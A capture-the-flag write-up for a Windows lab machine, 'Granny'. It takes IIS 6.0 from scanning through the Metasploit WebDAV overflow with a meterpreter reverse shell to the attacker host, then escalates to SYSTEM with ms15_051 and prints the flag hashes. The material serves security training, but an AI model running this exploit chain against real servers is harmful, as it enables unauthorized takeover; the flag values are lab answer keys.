Environment:
Name: Granny
OS: Windows
## Information Gathering
### Scanning the Target
```bash
$ nmap -sV -O -F -oA Granny --version-light 10.10.10.15
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-29 14:01 CST
Nmap scan report for 10.10.10.15
Host is up (0.46s latency).
Not shown: 99 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2003|2008|XP|2000 (92%)
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_2000::sp4
Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows Server 2008 Enterprise SP2 (92%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows 2003 SP2 (91%), Microsoft Windows XP SP3 (90%), Microsoft Windows XP (87%), Microsoft Windows 2000 SP4 (87%), Microsoft Windows Server 2003 SP1 - SP2 (86%), Microsoft Windows XP SP2 or Windows Server 2003 (86%), Microsoft Windows XP SP2 or Windows Server 2003 SP2 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```
- Here we can see port 80 running IIS 6.0, and the OS is Windows XP.
## Getting a Shell
### Vulnerability Enumeration
```bash
$ searchsploit IIS 6.0
--------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
Microsoft IIS 4.0/5.0/6.0 - Internal I | exploits/windows/remote/21057.txt
Microsoft IIS 5.0/6.0 FTP Server (Wind | exploits/windows/remote/9541.pl
Microsoft IIS 5.0/6.0 FTP Server - Sta | exploits/windows/dos/9587.txt
Microsoft IIS 6.0 - '/AUX / '.aspx' Re | exploits/windows/dos/3965.pl
Microsoft IIS 6.0 - ASP Stack Overflow | exploits/windows/dos/15167.txt
Microsoft IIS 6.0 - WebDAV 'ScStorageP | exploits/windows/remote/41738.py
Microsoft IIS 6.0 - WebDAV Remote Auth | exploits/windows/remote/8704.txt
Microsoft IIS 6.0 - WebDAV Remote Auth | exploits/windows/remote/8754.patch
Microsoft IIS 6.0 - WebDAV Remote Auth | exploits/windows/remote/8765.php
Microsoft IIS 6.0 - WebDAV Remote Auth | exploits/windows/remote/8806.pl
Microsoft IIS 6.0/7.5 (+ PHP) - Multip | exploits/windows/remote/19033.txt
--------------------------------------- ----------------------------------------
Shellcodes: No Result
```
### Searching for the Exploit
```bash
msf5 > search ScStorageP
Matching Modules
================
## Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/iis/iis_webdav_scstoragepathfromurl 2017-03-26 manual Yes Microsoft IIS WebDav ScStoragePathFromUrl Overflow
```
### Loading the Exploit
```bash
msf5 > use exploit/windows/iis/iis_webdav_scstoragepathfromurl
```
### Configuring the Exploit
```bash
msf5 > search ScStorageP
Matching Modules
================
## Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/iis/iis_webdav_scstoragepathfromurl 2017-03-26 manual Yes Microsoft IIS WebDav ScStoragePathFromUrl Overflow
msf5 > use exploit/windows/iis/iis_webdav_scstoragepathfromurl
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > show options
Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):
Name Current Setting Required Description
---- --------------- -------- -----------
MAXPATHLENGTH 60 yes End of physical path brute force
MINPATHLENGTH 3 yes Start of physical path brute force
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path of IIS 6 web application
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Microsoft Windows Server 2003 R2 SP2 x86
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set RHOSTS 10.10.10.15
RHOSTS => 10.10.10.15
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > show options
Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):
Name Current Setting Required Description
---- --------------- -------- -----------
MAXPATHLENGTH 60 yes End of physical path brute force
MINPATHLENGTH 3 yes Start of physical path brute force
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.10.10.15 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path of IIS 6 web application
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Microsoft Windows Server 2003 R2 SP2 x86
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set LHOST 10.10.14.16
LHOST => 10.10.14.16
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run
[*] Started reverse TCP handler on 10.10.14.16:4444
[*] Trying path length 3 to 60 ...
[*] Sending stage (180291 bytes) to 10.10.10.1
```
- Note that the VPN can cause the reverse connection to hang, so set the local IP (LHOST) manually.
## Privilege Escalation
### Process Migration
```bash
meterpreter > shell
Process 2868 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>whoami
whoami
nt authority\network service
C:\WINDOWS\system32>exit
exit
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
276 4 smss.exe
324 276 csrss.exe
348 276 winlogon.exe
396 348 services.exe
408 348 lsass.exe
608 396 svchost.exe
684 396 svchost.exe
744 396 svchost.exe
776 396 svchost.exe
804 396 svchost.exe
940 396 spoolsv.exe
968 396 msdtc.exe
1080 396 cisvc.exe
1136 396 svchost.exe
1184 396 inetinfo.exe
1220 396 svchost.exe
1332 396 VGAuthService.exe
1412 396 vmtoolsd.exe
1460 396 svchost.exe
1600 396 svchost.exe
1712 396 alg.exe
1840 608 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe
1920 396 dllhost.exe
2196 1460 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe
2304 1080 cidaemon.exe
2348 1080 cidaemon.exe
2376 1080 cidaemon.exe
2392 608 wmiprvse.exe
2944 348 logon.scr
3104 608 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe
meterpreter > migrate 3104
[*] Migrating from 1840 to 3104...
[*] Migration completed successfully.
```
- Migrate into a process running as `NETWORK SERVICE`.
### Backgrounding the Session
```bash
meterpreter > background
[*] Backgrounding session 1...
```
### Local Exploit Enumeration
```bash
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > show options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
msf5 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 2
msf5 post(multi/recon/local_exploit_suggester) > run
```
- Just run `local_exploit_suggester` against the session.
```bash
[*] 10.10.10.14 - Collecting local exploits for x86/windows...
[*] 10.10.10.14 - 29 exploit checks are being tried...
[+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
```
- Enumeration succeeded; `ms15_051_client_copy_image` is usable.
### Loading the Exploit
```bash
msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms15_051_client_copy_image
msf5 exploit(windows/local/ms15_051_client_copy_image) > show options
Module options (exploit/windows/local/ms15_051_client_copy_image):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Exploit target:
Id Name
-- ----
0 Windows x86
msf5 exploit(windows/local/ms15_051_client_copy_image) > set session 1
session => 1
msf5 exploit(windows/local/ms15_051_client_copy_image) > set LHOST 10.10.14.16
LHOST => 10.10.14.16
msf5 exploit(windows/local/ms15_051_client_copy_image) > run
[*] Started reverse TCP handler on 10.10.14.16:4444
[*] Launching notepad to host the exploit...
[+] Process 3380 launched.
[*] Reflectively injecting the exploit DLL into 3380...
[*] Injecting exploit into 3380...
[*] Exploit injected. Injecting payload into 3380...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (180291 bytes) to 10.10.10.15
[*] Meterpreter session 2 opened (10.10.14.16:4444 -> 10.10.10.15:1036) at 2019-10-29 14:59:03 +0800
meterpreter > shell
Process 2356 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>whoami
whoami
nt authority\system
```
## Flags
```bash
C:\WINDOWS\system32>cd c:\
cd c:\
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of C:\
04/12/2017 04:27 PM <DIR> ADFS
04/12/2017 04:04 PM 0 AUTOEXEC.BAT
04/12/2017 04:04 PM 0 CONFIG.SYS
04/12/2017 09:19 PM <DIR> Documents and Settings
04/12/2017 04:17 PM <DIR> FPSE_search
04/12/2017 04:17 PM <DIR> Inetpub
12/24/2017 07:21 PM <DIR> Program Files
12/24/2017 07:30 PM <DIR> WINDOWS
04/12/2017 04:05 PM <DIR> wmpub
2 File(s) 0 bytes
7 Dir(s) 18,126,544,896 bytes free
C:\>cd Documents and Settings
cd Documents and Settings
C:\Documents and Settings>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of C:\Documents and Settings
04/12/2017 09:19 PM <DIR> .
04/12/2017 09:19 PM <DIR> ..
04/12/2017 08:48 PM <DIR> Administrator
04/12/2017 04:03 PM <DIR> All Users
04/12/2017 09:19 PM <DIR> Lakis
0 File(s) 0 bytes
5 Dir(s) 18,126,544,896 bytes free
C:\Documents and Settings>cd Lakis
cd Lakis
C:\Documents and Settings\Lakis>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of C:\Documents and Settings\Lakis
04/12/2017 09:19 PM <DIR> .
04/12/2017 09:19 PM <DIR> ..
04/12/2017 09:19 PM <DIR> Desktop
04/12/2017 09:19 PM <DIR> Favorites
04/12/2017 09:19 PM <DIR> My Documents
04/12/2017 03:42 PM <DIR> Start Menu
04/12/2017 03:44 PM 0 Sti_Trace.log
1 File(s) 0 bytes
6 Dir(s) 18,126,544,896 bytes free
C:\Documents and Settings\Lakis>cd Desktop
cd Desktop
C:\Documents and Settings\Lakis\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of C:\Documents and Settings\Lakis\Desktop
04/12/2017 09:19 PM <DIR> .
04/12/2017 09:19 PM <DIR> ..
04/12/2017 09:20 PM 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 18,126,540,800 bytes free
C:\Documents and Settings\Lakis\Desktop>type user.txt
type user.txt
700c5dc163014e22b3e408f8703f67d1
C:\Documents and Settings\Lakis\Desktop>cd ../../
cd ../../
C:\Documents and Settings>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of C:\Documents and Settings
04/12/2017 09:19 PM <DIR> .
04/12/2017 09:19 PM <DIR> ..
04/12/2017 08:48 PM <DIR> Administrator
04/12/2017 04:03 PM <DIR> All Users
04/12/2017 09:19 PM <DIR> Lakis
0 File(s) 0 bytes
5 Dir(s) 18,126,594,048 bytes free
C:\Documents and Settings>cd Administrator/Desktop
cd Administrator/Desktop
C:\Documents and Settings\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of C:\Documents and Settings\Administrator\Desktop
04/12/2017 04:28 PM <DIR> .
04/12/2017 04:28 PM <DIR> ..
04/12/2017 09:17 PM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 18,126,594,048 bytes free
C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
aa4beed1c0584445ab463a6747bd06e9
C:\Documents and Settings\Administrator\Desktop>
```
## Takeaways
A classic MSF exploitation of an old Windows vulnerability, much like Grandpa.